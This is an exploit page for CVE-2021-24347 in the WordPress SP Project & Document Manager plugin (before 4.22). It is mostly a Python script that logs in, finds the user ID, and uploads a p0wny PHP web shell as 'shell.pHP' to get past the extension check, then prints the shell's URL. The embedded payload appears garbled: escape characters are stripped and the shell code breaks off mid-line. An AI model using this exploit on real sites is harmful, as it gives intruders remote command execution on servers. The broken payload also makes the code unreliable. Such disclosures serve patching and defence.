Authored by Ron Jost

WordPress SP Project and Document Manager plugin version 4.21 suffers from a remote shell upload vulnerability.

advisories | CVE-2021-24347

# Exploit Title: WordPress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)
# Date 07.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://smartypantsplugins.com/
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip
# Version: Before 4.22
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24347
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24347/README.md

'''
Description:
The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however,
the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded
by checking the file extension. It was discovered that php files could still be uploaded by
changing the file extension's case, for example, from "php" to "pHP".
'''


'''
Banner:
'''
banner = """
______ _______ ____ ___ ____ _ ____ _ _ _____ _ _ _____
/ ___ / / ____| |___ / _ ___ / | |___ | || ||___ /| || |___ |
| | / /| _| _____ __) | | | |__) | |_____ __) | || |_ |_ | || |_ / /
| |___ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _|__) |__ _/ /
____| _/ |_____| |_____|___/_____|_| |_____| |_||____/ |_|/_/

* WordPress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)
* @Hacker5preme

"""
print(banner)


'''
Import required modules:
'''
import requests
import argparse


'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
print('[*] Starting Exploit:')
print('')

'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'

# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}

# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
print('[+] Authentication successfull !')
else:
print('[-] Authentication failed !')
exit()


'''
Retrieve User ID from the widget:
'''
user_id_text = session.get('http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview').text
search_string = "<form><select name='user_uid' id='user_uid' class=''>"
user_string = ">" + username
user_id_text = user_id_text[user_id_text.find(search_string):]
user_id_text = user_id_text[user_id_text.find(user_string) - 2: user_id_text.find(user_string)]
user_id = user_id_text.replace("'", '')


'''
Exploit:
'''
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview&id=' + user_id

# Header (Exploit):
Header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": exploit_url,
"Content-Type": "multipart/form-data; boundary=---------------------------37032792112149247252673711332",
"Origin": "http://" + target_ip,
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}

# Web Shell payload (p0wny shell): https://github.com/flozz/p0wny-shell
shell_payload = "-----------------------------37032792112149247252673711332rnContent-Disposition: form-data; name="cdm_upload_file_field"rnrna1b3bac1bcrn-----------------------------37032792112149247252673711332rnContent-Disposition: form-data; name="_wp_http_referer"rnrn/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1rn-----------------------------37032792112149247252673711332rnContent-Disposition: form-data; name="dlg-upload-name"rnrnExploitsrn-----------------------------37032792112149247252673711332rnContent-Disposition: form-data; name="dlg-upload-file[]"; filename=""rnContent-Type: application/octet-streamrnrnrn-----------------------------37032792112149247252673711332rnContent-Disposition: form-data; name="dlg-upload-file[]"; filename="shell.pHP"rnContent-Type: application/x-phprnrn<?phpnnfunction featureShell($cmd, $cwd) {n $stdout = array();nn if (preg_match("/^s*cds*$/", $cmd)) {n // passn } elseif (preg_match("/^s*cds+(.+)s*(2>&1)?$/", $cmd)) {n chdir($cwd);n preg_match("/^s*cds+([^s]+)s*(2>&1)?$/", $cmd, $match);n chdir($match[1]);n } elseif (preg_match("/^s*downloads+[^s]+s*(2>&1)?$/", $cmd)) {n chdir($cwd);n preg_match("/^s*downloads+([^s]+)s*(2>&1)?$/", $cmd, $match);n return featureDownload($match[1]);n } else {n chdir($cwd);n exec($cmd, $stdout);n }nn return array(n "stdout" => $stdout,n "cwd" => getcwd()n );n}nnfunction featurePwd() {n return array("cwd" => getcwd());n}nnfunction featureHint($fileName, $cwd, $type) {n chdir($cwd);n if ($type == 'cmd') {n $cmd = "compgen -c $fileName";n } else {n $cmd = "compgen -f $fileName";n }n $cmd = "/bin/bash -c "$cmd"";n $files = explode("n", shell_exec($cmd));n return array(n 'files' => $files,n );n}nnfunction featureDownload($filePath) {n $file = @file_get_contents($filePath);n if ($file === FALSE) {n return array(n 'stdout' => array('File not found / no read permission.'),n 'cwd' => getcwd()n );n } else {n return array(n 'name' => basename($filePath),n 'file' => base64_encode($file)n );n }n}nnfunction featureUpload($path, $file, $cwd) {n chdir($cwd);n $f = @fopen($path, 'wb');n if ($f === FALSE) {n return array(n 'stdout' => array('Invalid path / no write permission.'),n 'cwd' => getcwd()n );n } else {n fwrite($f, base64_decode($file));n fclose($f);n return array(n 'stdout' => array('Done.'),n 'cwd' => getcwd()n );n }n}nnif (isset($_GET["feature"])) {nn $response = NULL;nn switch ($_GET["feature"]) {n case "shell":n $cmd = $_POST['cmd'];n if (!preg_match('/2>/', $cmd)) {n $cmd .= ' 2>&1';n }n $response = featureShell($cmd, $_POST["cwd"]);n break;n case "pwd":n $response = featurePwd();n break;n case "hint":n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);n break;n case 'upload':n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);n }nn header("Content-Type: application/json");n echo json_encode($response);n die();n}nn?><!DOCTYPE html>nn<html>nn <head>n <meta charset="UTF-8" />n <title>p0wny@shell:~#</title>n <meta name="viewport" content="width=device-width, initial-scale=1.0" />n <style>n html, body {n margin: 0;n padding: 0;n background: #333;n color: #eee;n font-family: monospace;n }nn *::-we

# Exploit:
session.post(exploit_url, headers=header, data=shell_payload)
print('')
print('[+] Exploit done !')
print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/sp-client-document-manager/' + user_id + '/shell.php')
print('')